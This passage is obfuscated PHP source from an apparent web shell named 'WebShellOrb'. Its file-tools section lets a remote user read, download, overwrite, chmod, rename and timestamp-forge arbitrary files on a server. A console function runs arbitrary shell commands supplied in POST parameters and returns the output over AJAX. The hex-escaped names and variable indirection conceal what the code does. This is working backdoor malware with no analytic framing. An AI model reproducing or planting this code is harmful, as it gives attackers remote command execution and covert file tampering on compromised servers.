${${"\x47\x4cO\x42\x41\x4cS"}["\x76x\x68\x64\x6f\x69h\x71\x6c\x6bd"]} = @mime_content_type($_POST["p1"]);
header("Co\x6et\x65nt-\x54\x79p\x65: " . ${${"\x47L\x4f\x42\x41\x4c\x53"}["\x76xh\x64\x6f\x69\x68\x71\x6c\x6b\x64"]});
} else
header("\x43on\x74e\x6et-\x54y\x70e:\x20\x61\x70p\x6c\x69\x63a\x74\x69\x6fn/o\x63tet-str\x65\x61m");
${${"\x47L\x4fBA\x4c\x53"}["\x74\x62\x72\x68\x71\x62\x69"]} = @fopen($_POST["\x701"], "\x72");
if (${${"G\x4cOB\x41\x4c\x53"}["\x74\x62r\x68q\x62\x69"]}) {
${"\x47L\x4fBAL\x53"}["\x66\x69q\x65\x6ei\x68p\x6d\x6f"] = "\x66p";
${"\x47\x4c\x4f\x42A\x4c\x53"}["f\x6bmsx\x76\x66"] = "f\x70";
while (!@feof(${${"\x47\x4cOBA\x4c\x53"}["f\x69qen\x69h\x70m\x6f"]}))
echo @fread(${${"GLO\x42\x41L\x53"}["\x74b\x72\x68\x71\x62\x69"]}, 1024);
fclose(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["f\x6b\x6ds\x78\x76\x66"]});
}
}
exit;
}
${"\x47\x4c\x4fB\x41\x4cS"}["f\x63\x6d\x6c\x63\x70\x6d"] = "v";
if (@$_POST["p\x32"] == "mk\x66ile") {
if (!file_exists($_POST["p1"])) {
$yacaqadof = "\x66p";
${${"\x47\x4cOB\x41LS"}["\x74\x62rh\x71\x62\x69"]} = @fopen($_POST["p1"], "\x77");
if (${$yacaqadof}) {
${"G\x4cOB\x41\x4c\x53"}["\x6e\x64\x74xa\x75\x6a"] = "fp";
$_POST["p\x32"] = "\x65dit";
fclose(${${"\x47\x4cOBA\x4c\x53"}["nd\x74\x78a\x75\x6a"]});
}
}
}
WebShellOrbHeader();
${"\x47\x4c\x4f\x42\x41\x4c\x53"}["g\x6e\x6c\x63u\x72\x71o"] = "g\x69d";
echo "<\x681>\x46\x69l\x65\x20\x74oo\x6cs\x3c/h1\x3e\x3c\x64iv\x20class=\x63\x6fntent\x3e";
if (!file_exists(@$_POST["p1"])) {
echo "\x46\x69le\x20no\x74 \x65xis\x74\x73";
WebShellOrbFooter();
return;
}
${${"GL\x4fB\x41\x4c\x53"}["c\x79\x65e\x64\x69m\x64kb\x6d"]} = @posix_getpwuid(@fileowner($_POST["p1"]));
${"G\x4cOB\x41LS"}["zo\x65\x7a\x69\x73\x68\x73"] = "c";
$vuqevyb = "\x69";
$xieybe = "h";
if (!${${"\x47L\x4f\x42\x41\x4c\x53"}["\x67\x6b\x6a\x79r\x7a\x78\x6eg"]}) {
$krhueyipvqu = "\x67\x69d";
${${"\x47\x4c\x4f\x42\x41\x4cS"}["gk\x6ayr\x7a\x78\x6eg"]}["\x6e\x61\x6d\x65"] = @fileowner($_POST["\x701"]);
${$krhueyipvqu}["name"] = @filegroup($_POST["p\x31"]);
} else
${${"GLOB\x41\x4cS"}["\x65\x6c\x6b\x79\x78m\x69\x79\x75"]} = @posix_getgrgid(@filegroup($_POST["\x70\x31"]));
${"\x47\x4cO\x42A\x4cS"}["\x78\x61\x67\x6b\x69\x75\x6d\x69\x7a\x62\x6d"] = "n";
${"GL\x4fB\x41\x4c\x53"}["\x64\x6c\x68dsyobu\x74\x64\x79"] = "f\x70";
echo "<\x73pa\x6e\x3e\x4ea\x6de:</sp\x61\x6e> " . htmlspecialchars(@basename($_POST["\x701"])) . " \x3c\x73p\x61\x6e>\x53\x69ze:</\x73\x70\x61n>\x20" . (is_file($_POST["p\x31"]) ? WebShellOrbViewSize(filesize($_POST["\x70\x31"])) : "-") . "\x20<sp\x61n>Per\x6d\x69s\x73\x69\x6f\x6e:\x3c/\x73p\x61n> " . WebShellOrbPermsColor($_POST["\x70\x31"]) . "\x20<sp\x61n>Ow\x6e\x65\x72/\x47\x72o\x75\x70:\x3c/\x73\x70a\x6e\x3e\x20" . ${${"G\x4cO\x42\x41\x4c\x53"}["\x67kj\x79r\x7axng"]}["n\x61\x6de"] . "/" . ${${"\x47L\x4f\x42\x41\x4cS"}["\x67nl\x63ur\x71\x6f"]}["name"] . "\x3c\x62\x72\x3e";
echo "<\x73\x70\x61n\x3eC\x68a\x6e\x67e\x20\x74\x69\x6d\x65:</s\x70\x61n\x3e\x20" . date("\x59-m-d\x20H:\x69:\x73", filectime($_POST["p1"])) . "\x20<\x73\x70a\x6e>Ac\x63\x65s\x73 \x74\x69me:</\x73pan> " . date("\x59-\x6d-d\x20\x48:i:\x73", fileatime($_POST["p1"])) . " \x3c\x73p\x61\x6e\x3eM\x6f\x64\x69f\x79\x20tim\x65:\x3c/sp\x61n> " . date("Y-\x6d-d\x20H:\x69:s", filemtime($_POST["\x70\x31"])) . "<\x62r><\x62\x72\x3e";
$jkomyhk = "\x63";
if (empty($_POST["\x702"]))
$_POST["\x70\x32"] = "v\x69\x65\x77";
if (is_file($_POST["p1"]))
${${"\x47\x4c\x4f\x42A\x4c\x53"}["w\x66al\x62mw"]} = array(
"\x56i\x65\x77",
"Hi\x67\x68l\x69\x67ht",
"D\x6fwn\x6coa\x64",
"Hexd\x75\x6d\x70",
"Ed\x69\x74",
"\x43hmo\x64",
"\x52e\x6eame",
"To\x75\x63\x68"
);
else
${${"\x47\x4cOB\x41\x4c\x53"}["f\x73kqo\x77\x79\x6fvp\x6b"]} = array(
"\x43\x68\x6dod",
"\x52en\x61me",
"\x54\x6fuch"
);
foreach (${${"\x47\x4c\x4f\x42\x41L\x53"}["\x66s\x6b\x71\x6fwyo\x76\x70\x6b"]} as ${${"\x47\x4c\x4fBALS"}["\x76\x76\x64x\x6d\x6a\x62g\x65c"]})
echo "<\x61 hr\x65f\x3d\x23\x20onclic\x6b\x3d\x22\x67(\x6eull,\x6e\x75l\x6c,\x27" . urlencode($_POST["\x701"]) . "\x27,\x27" . strtolower(${${"\x47\x4c\x4fBA\x4c\x53"}["\x66\x63\x6d\x6cc\x70\x6d"]}) . "\x27)\x22\x3e" . ((strtolower(${$sfgrxg}) == @$_POST["p\x32"]) ? "\x3cb\x3e[\x20" . ${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x6ds\x6c\x73\x68ihi"]} . "\x20]\x3c/b\x3e" : ${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x76\x76\x64x\x6d\x6a\x62ge\x63"]}) . "\x3c/\x61\x3e\x20";
${"\x47\x4cO\x42\x41\x4c\x53"}["c\x6b\x73so\x77bw"] = "f\x70";
echo "<\x62r><\x62r>";
switch ($_POST["\x702"]) {
case "v\x69ew":
echo "<pre\x20\x63\x6c\x61\x73\x73\x3dml1\x3e";
${${"\x47LO\x42\x41\x4c\x53"}["\x74\x62\x72h\x71\x62i"]} = @fopen($_POST["p\x31"], "r");
if (${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x64\x6c\x68\x64s\x79\x6f\x62u\x74\x64\x79"]}) {
${"\x47\x4cO\x42A\x4c\x53"}["\x67\x66dl\x6ek\x69\x63\x77r\x63"] = "\x66\x70";
$pzihhtxvna = "\x66\x70";
while (!@feof(${${"G\x4cOBAL\x53"}["g\x66\x64\x6c\x6e\x6b\x69\x63\x77r\x63"]}))
echo htmlspecialchars(@fread(${$pzihhtxvna}, 1024));
@fclose(${${"G\x4c\x4f\x42AL\x53"}["t\x62\x72\x68q\x62i"]});
}
echo "</pr\x65\x3e";
break;
case "hig\x68li\x67\x68t":
if (@is_readable($_POST["p1"])) {
echo "\x3cd\x69v\x20\x63l\x61s\x73=ml1\x20s\x74yl\x65\x3d\"ba\x63k\x67r\x6f\x75nd-c\x6fl\x6f\x72:\x20\x23e1e\x31\x65\x31\x3bcolo\x72:\x62la\x63k;\x22\x3e";
${"\x47\x4c\x4f\x42\x41\x4cS"}["w\x77zw\x65u\x6a"] = "co\x64e";
${"\x47\x4c\x4fB\x41\x4c\x53"}["\x64j\x70f\x66\x6a\x79"] = "\x63o\x64\x65";
${${"\x47\x4c\x4f\x42\x41LS"}["\x77\x77\x7aw\x65\x75j"]} = @highlight_file($_POST["\x701"], true);
echo str_replace(array(
"<spa\x6e\x20",
"</\x73\x70an>"
), array(
"<\x66o\x6e\x74 ",
"\x3c/f\x6fn\x74>"
), ${${"\x47\x4cO\x42\x41L\x53"}["\x64j\x70f\x66j\x79"]}) . "</div>";
}
break;
case "c\x68mo\x64":
if (!empty($_POST["p3"])) {
$nerjtgakmkl = "pe\x72\x6d\x73";
${"\x47L\x4f\x42\x41\x4c\x53"}["\x6cwn\x6cj\x77o\x7av\x76\x66m"] = "\x69";
$tmvoqwqnvp = "pe\x72\x6ds";
$djwprjghcfev = "i";
${$nerjtgakmkl} = 0;
for (${${"G\x4c\x4f\x42A\x4c\x53"}["\x63\x6c\x6b\x75yo\x6a\x6a"]} = strlen($_POST["\x703"]) - 1; ${${"\x47LOB\x41L\x53"}["l\x77\x6e\x6c\x6a\x77o\x7a\x76\x76\x66\x6d"]} >= 0; --${${"\x47\x4c\x4f\x42A\x4cS"}["cl\x6bu\x79\x6f\x6aj"]})
${$tmvoqwqnvp} += (int) $_POST["p3"][${${"\x47\x4c\x4fB\x41L\x53"}["\x63l\x6bu\x79\x6f\x6a\x6a"]}] * pow(8, (strlen($_POST["p\x33"]) - ${$djwprjghcfev} - 1));
if (!@chmod($_POST["\x70\x31"], ${${"\x47\x4c\x4fB\x41\x4cS"}["b\x67\x62\x6ed\x67l\x77"]}))
echo "C\x61\x6e\x27t\x20\x73\x65t\x20\x70er\x6dis\x73io\x6es!\x3cb\x72><\x73cr\x69pt\x3edo\x63\x75\x6dent\x2e\x6d\x66\x2e\x703.val\x75e\x3d\x22\x22\x3b\x3c/scr\x69p\x74>";
}
clearstatcache();
echo "<scr\x69p\x74\x3ep3\x5f\x3d\"\x22;</\x73c\x72i\x70\x74>\x3c\x66o\x72\x6d on\x73\x75bmi\x74=\x22\x67(\x6e\x75l\x6c,\x6e\x75ll,'" . urlencode($_POST["\x701"]) . "',n\x75\x6c\x6c,\x74h\x69\x73\x2ech\x6d\x6fd.val\x75e);\x72e\x74ur\x6e\x20\x66als\x65\x3b\x22>\x3c\x69n\x70ut type\x3dte\x78\x74 n\x61me\x3dc\x68mod\x20v\x61\x6c\x75\x65\x3d\"" . substr(sprintf("%o", fileperms($_POST["p1"])), -4) . "\">\x3c\x69\x6epu\x74 \x74yp\x65\x3dsu\x62\x6d\x69t\x20\x76al\x75\x65\x3d\"\x3e\x3e\"\x3e\x3c/\x66\x6f\x72\x6d\x3e";
break;
case "\x65\x64\x69t":
if (!is_writable($_POST["\x701"])) {
echo "F\x69\x6c\x65\x20\x69\x73\x6e\x27\x74 \x77\x72itea\x62\x6ce";
break;
}
if (!empty($_POST["\x70\x33"])) {
${"G\x4cO\x42AL\x53"}["\x74\x6bm\x6f\x79\x6d\x78t\x63\x6f"] = "\x66\x70";
$oixcyn = "\x74\x69m\x65";
${$oixcyn} = @filemtime($_POST["p1"]);
$_POST["\x70\x33"] = substr($_POST["\x703"], 1);
${${"\x47L\x4f\x42A\x4c\x53"}["\x74\x6bm\x6f\x79m\x78\x74\x63\x6f"]} = @fopen($_POST["p1"], "\x77");
if (${${"G\x4c\x4f\x42\x41L\x53"}["tbrh\x71\x62i"]}) {
@fwrite(${${"\x47L\x4f\x42\x41\x4c\x53"}["\x74\x62\x72\x68\x71b\x69"]}, $_POST["\x703"]);
$klfedf = "\x74\x69\x6d\x65";
@fclose(${${"\x47L\x4fBA\x4c\x53"}["\x74b\x72hqbi"]});
echo "\x53a\x76\x65d\x21<\x62r\x3e<s\x63\x72\x69p\x74>p\x33_\x3d\"\"\x3b</\x73c\x72ipt\x3e";
@touch($_POST["\x701"], ${$klfedf}, ${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x72\x69\x66o\x68o\x6au"]});
}
}
echo "\x3c\x66o\x72m o\x6es\x75\x62m\x69\x74=\"g(\x6eul\x6c,nul\x6c,\x27" . urlencode($_POST["p\x31"]) . "\x27,null,'1'+thi\x73.\x74e\x78t.v\x61lue);r\x65\x74u\x72\x6e fals\x65;\"\x3e<\x74e\x78\x74area na\x6d\x65\x3dtex\x74 \x63l\x61\x73s=bi\x67\x61\x72\x65\x61\x3e";
${${"\x47\x4cOB\x41L\x53"}["\x63\x6bs\x73\x6f\x77\x62\x77"]} = @fopen($_POST["\x701"], "\x72");
if (${${"\x47\x4c\x4f\x42\x41L\x53"}["\x74\x62\x72hq\x62\x69"]}) {
$nfmitia = "\x66\x70";
while (!@feof(${${"GL\x4f\x42\x41\x4cS"}["tb\x72\x68\x71\x62i"]}))
echo htmlspecialchars(@fread(${${"\x47\x4cO\x42\x41\x4c\x53"}["\x74\x62\x72h\x71\x62\x69"]}, 1024));
@fclose(${$nfmitia});
}
echo "</\x74e\x78t\x61rea>\x3c\x69npu\x74 type=s\x75bm\x69\x74\x20val\x75\x65\x3d\">>\">\x3c/\x66\x6f\x72\x6d\x3e";
break;
case "\x68ex\x64um\x70":
${${"\x47\x4cO\x42\x41\x4c\x53"}["\x7a\x6fezi\x73\x68\x73"]} = @file_get_contents($_POST["\x70\x31"]);
${${"\x47\x4cOB\x41L\x53"}["\x78agk\x69\x75m\x69\x7a\x62m"]} = 0;
${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x61i\x68\x78\x74gu\x6a"]} = array(
"0\x30\x300\x30\x30\x300\x3c\x62\x72\x3e",
"",
""
);
${${"\x47\x4cO\x42\x41L\x53"}["\x73\x72\x68\x70\x75\x6eo"]} = strlen(${$jkomyhk});
for (${${"\x47LOB\x41\x4cS"}["\x79\x68o\x63\x65e"]} = 0; ${$vuqevyb} < ${$ixhzma}; ++${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x63\x6c\x6buy\x6f\x6aj"]}) {
$thmyniq = "h";
${"\x47\x4cOB\x41L\x53"}["\x72\x78\x6ap\x70\x79\x6a"] = "\x63";
$zwhvop = "\x69";
$nhqwejrynrqs = "h";
$nvtehletxkg = "\x63";
$ifdzzuwde = "\x68";
${$ifdzzuwde}[1] .= sprintf("\x2502\x58", ord(${$nvtehletxkg}[${$zwhvop}])) . "\x20";
${"\x47L\x4fB\x41L\x53"}["\x6f\x78u\x65\x72\x6dmp"] = "\x68";
$hyxbwfpurqe = "\x68";
switch (ord(${${"G\x4cOBA\x4cS"}["s\x62uww\x6b\x6fz\x74"]}[${${"\x47L\x4fB\x41\x4c\x53"}["\x63\x6cku\x79\x6fjj"]}])) {
case 0:
${${"G\x4c\x4f\x42\x41\x4cS"}["ox\x75\x65rmm\x70"]}[2] .= "\x20";
break;
case 9:
${$thmyniq}[2] .= "\x20";
break;
case 10:
${$nhqwejrynrqs}[2] .= " ";
break;
case 13:
${${"GL\x4f\x42AL\x53"}["\x61\x69h\x78t\x67\x75\x6a"]}[2] .= " ";
break;
default:
${$hyxbwfpurqe}[2] .= ${${"\x47L\x4f\x42\x41\x4c\x53"}["rx\x6ap\x70yj"]}[${${"GL\x4f\x42AL\x53"}["\x63\x6c\x6b\x75y\x6f\x6a\x6a"]}];
break;
}
${${"\x47L\x4f\x42AL\x53"}["\x6f\x6e\x6ddr\x78"]}++;
if (${${"GLO\x42AL\x53"}["\x6f\x6em\x64\x72\x78"]} == 32) {
${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x6f\x6emd\x72x"]} = 0;
$evxodxyjwete = "h";
$fvknjtlk = "l\x65\x6e";
if (${${"G\x4cOB\x41\x4cS"}["c\x6c\x6bu\x79o\x6a\x6a"]} + 1 < ${$fvknjtlk}) {
${"\x47\x4c\x4f\x42\x41L\x53"}["p\x6e\x70\x6b\x77rzt\x6f\x79\x7a"] = "h";
${${"\x47L\x4f\x42A\x4c\x53"}["\x70\x6ep\x6bwr\x7a\x74oy\x7a"]}[0] .= sprintf("%\x308X", ${${"\x47\x4cO\x42A\x4c\x53"}["\x63\x6ck\x75yo\x6a\x6a"]} + 1) . "\x3cbr\x3e";
}
${$evxodxyjwete}[1] .= "<\x62\x72\x3e";
${${"\x47\x4c\x4fB\x41L\x53"}["\x61i\x68\x78tg\x75\x6a"]}[2] .= "\n";
}
}
echo "\x3c\x74\x61\x62l\x65 \x63e\x6cls\x70\x61\x63i\x6eg\x3d1\x20c\x65\x6c\x6cpad\x64i\x6e\x67\x3d5\x20b\x67c\x6f\x6cor=\x232\x3222\x322><t\x72\x3e<t\x64\x20\x62g\x63o\x6c\x6fr=#33\x33333><\x73pan s\x74\x79l\x65\x3d\"\x66o\x6et-\x77eig\x68t: \x6eor\x6dal;\"\x3e<pr\x65>" . ${${"\x47\x4cOB\x41\x4c\x53"}["a\x69\x68\x78\x74g\x75j"]}[0] . "</\x70\x72\x65\x3e</\x73\x70\x61\x6e>\x3c/t\x64\x3e\x3ct\x64 \x62gcol\x6f\x72\x3d\x23\x328\x32828><\x70\x72e\x3e" . ${$xieybe}[1] . "</pr\x65></t\x64><td bgc\x6f\x6cor\x3d\x23\x33\x333\x33\x33\x33\x3e<\x70\x72e>" . htmlspecialchars(${${"GL\x4fB\x41L\x53"}["\x61ih\x78\x74\x67\x75\x6a"]}[2]) . "\x3c/\x70r\x65></\x74\x64\x3e\x3c/\x74\x72\x3e\x3c/t\x61\x62\x6c\x65>";
break;
case "\x72e\x6eame":
if (!empty($_POST["\x70\x33"])) {
if (!@rename($_POST["p1"], $_POST["\x70\x33"]))
echo "\x43an\x27\x74\x20re\x6eam\x65\x21\x3cb\x72\x3e";
else
die("\x3c\x73c\x72\x69\x70t\x3eg(nu\x6c\x6c,n\x75l\x6c,\x22" . urlencode($_POST["p3"]) . "\x22,n\x75l\x6c,\x22\")</\x73\x63\x72\x69\x70t\x3e");
}
echo "\x3c\x66\x6fr\x6d \x6f\x6esu\x62\x6dit=\x22g(nu\x6cl,\x6eu\x6cl,\x27" . urlencode($_POST["p\x31"]) . "\x27,\x6e\x75ll,th\x69s\x2ena\x6d\x65.\x76a\x6cu\x65)\x3b\x72\x65\x74\x75rn\x20f\x61\x6cse\x3b\x22>\x3c\x69\x6epu\x74\x20\x74y\x70e\x3dt\x65xt n\x61me\x3d\x6e\x61\x6d\x65 \x76al\x75e=\"" . htmlspecialchars($_POST["p1"]) . "\"\x3e<\x69\x6e\x70\x75t ty\x70e\x3dsubm\x69\x74\x20v\x61\x6c\x75\x65=\"\x3e\x3e\x22\x3e</\x66o\x72m>";
break;
case "t\x6fu\x63h":
if (!empty($_POST["p\x33"])) {
${"G\x4c\x4f\x42\x41\x4cS"}["lkz\x78o\x6a\x62\x78"] = "\x74\x69\x6de";
${${"G\x4c\x4fBAL\x53"}["\x6c\x6b\x7ax\x6fj\x62\x78"]} = strtotime($_POST["p\x33"]);
if (${${"GL\x4f\x42ALS"}["\x72i\x66\x6fh\x6f\x6au"]}) {
$mhwnuhbbl = "\x74\x69\x6de";
if (!touch($_POST["p\x31"], ${$mhwnuhbbl}, ${${"\x47\x4cOB\x41\x4cS"}["\x72\x69\x66\x6f\x68\x6f\x6a\x75"]}))
echo "\x46\x61il!";
else
echo "\x54\x6fuche\x64\x21";
} else
echo "\x42a\x64\x20\x74i\x6de\x20\x66o\x72mat!";
}
clearstatcache();
echo "\x3c\x73\x63\x72i\x70t>\x703\x5f=\"\";</\x73cr\x69p\x74><\x66o\x72m\x20\x6f\x6e\x73\x75\x62\x6di\x74\x3d\"g(n\x75l\x6c,\x6e\x75\x6cl,'" . urlencode($_POST["\x70\x31"]) . "',\x6e\x75l\x6c,\x74\x68\x69s.touch.v\x61lue);r\x65\x74\x75rn\x20f\x61l\x73e;\">\x3c\x69n\x70u\x74\x20\x74ype\x3d\x74\x65\x78\x74 \x6e\x61m\x65=\x74\x6f\x75c\x68\x20\x76al\x75\x65=\x22" . date("Y-\x6d-d \x48:i:s", @filemtime($_POST["\x701"])) . "\x22>\x3c\x69n\x70\x75t\x20ty\x70e=s\x75\x62mit\x20\x76a\x6cue=\x22>\x3e\"\x3e\x3c/\x66\x6f\x72\x6d>";
break;
}
echo "\x3c/d\x69v>";
WebShellOrbFooter();
}
function actionConsole()
{
if (!empty($_POST["\x70\x31"]) && !empty($_POST["\x70\x32"])) {
WebShellOrbsetcookie(md5($_SERVER["HTTP_H\x4fST"]) . "\x73tderr\x5f\x74\x6f_\x6fut", true);
$_POST["\x701"] .= " 2>\x26\x31";
} elseif (!empty($_POST["\x70\x31"]))
WebShellOrbsetcookie(md5($_SERVER["HTT\x50\x5fHO\x53\x54"]) . "stde\x72r_to\x5f\x6fut", 0);
if (isset($_POST["a\x6a\x61\x78"])) {
WebShellOrbsetcookie(md5($_SERVER["H\x54T\x50\x5f\x48OS\x54"]) . "\x61\x6aa\x78", true);
ob_start();
echo "\x64.\x63\x66\x2ecm\x64.\x76\x61\x6c\x75\x65\x3d''\x3b\n";
${${"\x47LO\x42\x41\x4cS"}["\x6de\x72\x63gm\x64\x77\x65"]} = @iconv($_POST["ch\x61\x72set"], "\x55\x54\x46-\x38", addcslashes("\n\$ " . $_POST["\x70\x31"] . "\n" . WebShellOrbEx($_POST["\x70\x31"]), "\n\r\t\\'\0"));
if (preg_match("\x21\x2e*\x63d\\s+([^;]+)\$\x21", $_POST["\x701"], ${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["k\x68\x74\x6bb\x74\x62\x63\x70"]})) {
${"\x47LOB\x41\x4cS"}["\x6d\x63bi\x71\x79\x71u"] = "\x6d\x61\x74\x63\x68";
if (@chdir(${${"\x47LO\x42A\x4c\x53"}["\x6d\x63\x62i\x71y\x71u"]}[1])) {
$GLOBALS["\x63wd"] = @getcwd();
echo "c\x5f\x3d'" . $GLOBALS["cwd"] . "\x27\x3b";
}
}
echo "d.c\x66.out\x70u\x74\x2eva\x6c\x75\x65+=\x27" . ${${"\x47\x4cOB\x41LS"}["m\x65\x72cgm\x64\x77\x65"]} . "';";
${"GL\x4f\x42A\x4c\x53"}["\x65\x63g\x70\x6e\x79\x63\x6a\x6f"] = "te\x6dp";
echo "\x64.\x63f.ou\x74\x70u\x74.s\x63\x72\x6fl\x6c\x54op \x3d \x64\x2e\x63\x66.o\x75\x74put\x2e\x73c\x72o\x6c\x6cHe\x69\x67\x68t;";
$dkkkes = "te\x6d\x70";
${${"\x47\x4c\x4f\x42A\x4cS"}["me\x72c\x67\x6d\x64\x77e"]} = ob_get_clean();
echo strlen(${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x65\x63gpn\x79\x63\x6a\x6f"]}), "\n", ${$dkkkes};
exit;
}
if (empty($_POST["\x61j\x61x"]) && !empty($_POST["p1"]))
WebShellOrbsetcookie(md5($_SERVER["HT\x54P_\x48O\x53\x54"]) . "\x61jax", 0);
WebShellOrbHeader();
echo "\x3c\x73\x63r\x69p\x74>\n\x69f(\x77i\x6edow.\x45\x76\x65n\x74) wind\x6fw.ca\x70\x74ure\x45ve\x6e\x74s(Ev\x65\x6et\x2eK\x45\x59\x44\x4f\x57\x4e)\x3b\nv\x61r\x20cm\x64\x73 \x3d\x20new A\x72\x72\x61\x79('\x27)\x3b\n\x76\x61\x72 c\x75r\x20\x3d 0\x3b\nfu\x6e\x63t\x69\x6fn kp(e) {\n\t\x76\x61\x72\x20\x6e \x3d\x20(wi\x6e\x64o\x77.Event)\x20? \x65\x2e\x77hi\x63h\x20:\x20e\x2ek\x65\x79\x43\x6f\x64e;\n\t\x69f(n \x3d\x3d\x2038) {\n\t\tcu\x72--;\n\t\tif(c\x75r\x3e\x3d0)\n\t\t\t\x64o\x63\x75\x6d\x65\x6et.\x63f.\x63m\x64.\x76a\x6c\x75\x65 \x3d\x20\x63\x6d\x64\x73[\x63\x75\x72]\x3b\n\t\tel\x73e\n\t\t\tcu\x72++;\n\t} el\x73e \x69f(\x6e\x20\x3d\x3d\x204\x30) {\n\t\t\x63ur++\x3b\n\t\tif(\x63\x75r\x20\x3c\x20\x63md\x73\x2e\x6ceng\x74\x68)\n\t\t\td\x6f\x63u\x6d\x65\x6e\x74.cf.cm\x64\x2e\x76\x61l\x75e =\x20\x63md\x73[cur];\n\t\t\x65lse\n\t\t\t\x63u\x72--\x3b\n\t}\n}\n\x66un\x63\x74i\x6f\x6e \x61\x64d(\x63md)\x20{\n\t\x63m\x64s\x2e\x70op();\n\t\x63\x6dds\x2ep\x75\x73h(c\x6d\x64)\x3b\n\tcm\x64s.pu\x73\x68(\x27')\x3b\n\t\x63u\x72\x20\x3d\x20cm\x64\x73\x2e\x6c\x65n\x67t\x68-\x31;\n}\n\x3c/s\x63\x72ipt>";
echo "\x3ch\x31>\x43\x6fn\x73ol\x65\x3c/h\x31>\x3cd\x69\x76 \x63lass\x3d\x63o\x6e\x74\x65n\x74\x3e\x3c\x66\x6f\x72\x6d n\x61\x6de=c\x66 \x6f\x6esu\x62m\x69t\x3d\"\x69f(d.\x63\x66.\x63\x6d\x64.\x76\x61l\x75e=\x3d'\x63l\x65a\x72'){d\x2ecf.\x6fu\x74pu\x74.\x76a\x6c\x75\x65\x3d'\x27;\x64\x2e\x63f.c\x6d\x64.\x76a\x6cue\x3d\x27\x27\x3b\x72\x65\x74ur\x6e\x20fa\x6c\x73\x65\x3b}ad\x64(thi\x73.c\x6dd.\x76al\x75e)\x3b\x69\x66(t\x68\x69\x73\x2e\x61\x6a\x61\x78\x2e\x63\x68\x65cke\x64){a(\x6e\x75\x6cl,\x6eu\x6c\x6c,t\x68i\x73.cmd\x2e\x76\x61l\x75e,this\x2eshow_er\x72o\x72s.\x63he\x63\x6bed?1:\x27');}\x65\x6c\x73e{g(n\x75l\x6c,nu\x6c\x6c,\x74hi\x73.\x63\x6dd\x2ev\x61lue,\x74hi\x73\x2es\x68\x6f\x77_\x65\x72r\x6f\x72\x73\x2e\x63h\x65c\x6b\x65\x64?1:\x27');} r\x65\x74ur\x6e \x66\x61\x6c\x73\x65;\x22><\x73\x65\x6c\x65ct\x20name\x3d\x61\x6ci\x61s>";
${"\x47L\x4f\x42\x41\x4c\x53"}["\x6cp\x70\x69\x76\x7a\x6c\x72t\x71"] = "v";
foreach ($GLOBALS["a\x6c\x69ase\x73"] as ${${"G\x4c\x4f\x42AL\x53"}["\x6fn\x6d\x64r\x78"]} => ${${"\x47L\x4f\x42A\x4c\x53"}["\x6cpp\x69\x76zl\x72t\x71"]}) {
if (${${"\x47L\x4f\x42\x41\x4c\x53"}["\x76\x76\x64x\x6d\x6a\x62\x67ec"]} == "") {
$mtvypobd = "n";
echo "<optgrou\x70 la\x62e\x6c\x3d\"-" . htmlspecialchars(${$mtvypobd}) . "-\"\x3e</op\x74group>";
continue;
}
echo "<\x6f\x70\x74io\x6e v\x61l\x75\x65=\"" . htmlspecialchars(${${"\x47\x4cO\x42\x41L\x53"}["\x76v\x64\x78mj\x62\x67\x65\x63"]}) . "\"\x3e" . ${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x6f\x6e\x6d\x64\x72\x78"]} . "</\x6f\x70ti\x6fn\x3e";
}
echo "</s\x65\x6ce\x63t>\x3c\x69n\x70u\x74 type\x3d\x62u\x74\x74\x6fn\x20\x6fnc\x6c\x69\x63k=\"ad\x64(\x64.\x63f.a\x6c\x69as.valu\x65);i\x66(d.c\x66\x2ea\x6aa\x78\x2e\x63hec\x6be\x64){\x61(n\x75\x6c\x6c,n\x75l\x6c,\x64\x2e\x63\x66.ali\x61\x73\x2e\x76\x61\x6c\x75e,d.cf.sho\x77\x5f\x65r\x72\x6frs.\x63h\x65\x63k\x65\x64?\x31:'');}\x65l\x73\x65{g(\x6e\x75\x6cl,n\x75\x6c\x6c,\x64.\x63f\x2e\x61l\x69as.\x76\x61\x6cue,d.c\x66\x2e\x73ho\x77_e\x72r\x6frs\x2ec\x68\x65\x63k\x65d?\x31:\x27');}\x22\x20\x76a\x6c\x75\x65=\x22>\x3e\x22\x3e\x20<n\x6fb\x72\x3e<\x69npu\x74\x20type=\x63\x68eckbox\x20na\x6de=\x61\x6a\x61\x78\x20\x76a\x6c\x75e\x3d1\x20" . (@$_COOKIE[md5($_SERVER["\x48T\x54P_HOS\x54"]) . "aj\x61\x78"] ? "ch\x65\x63\x6be\x64" : "") . ">\x20sen\x64 using\x20A\x4aAX\x20<\x69\x6eput\x20\x74\x79\x70e\x3dc\x68\x65\x63\x6bb\x6fx\x20n\x61me\x3ds\x68\x6f\x77\x5f\x65\x72\x72o\x72\x73 va\x6cue\x3d\x31 " . (!empty($_POST["\x702"]) || $_COOKIE[md5($_SERVER["H\x54T\x50\x5fHO\x53\x54"]) . "\x73\x74d\x65\x72\x72\x5f\x74\x6f_\x6fut"] ? "c\x68\x65cked" : "") . "\x3e\x20\x72e\x64ir\x65c\x74 st\x64er\x72 to\x20\x73t\x64\x6f\x75t\x20(\x32\x3e\x26\x31)</\x6e\x6f\x62\x72\x3e\x3cbr/><t\x65\x78\x74\x61rea \x63l\x61ss\x3dbiga\x72ea name=o\x75t\x70\x75t \x73ty\x6c\x65=\"bo\x72d\x65r-\x62o\x74to\x6d:\x30\x3bm\x61\x72gi\x6e:\x30\x3b\x22 \x72\x65\x61d\x6fn\x6cy\x3e";
if (!empty($_POST["\x701"])) {
echo htmlspecialchars("\$\x20" . $_POST["p\x31"] . "\n" . WebShellOrbEx($_POST["\x70\x31"]));
}
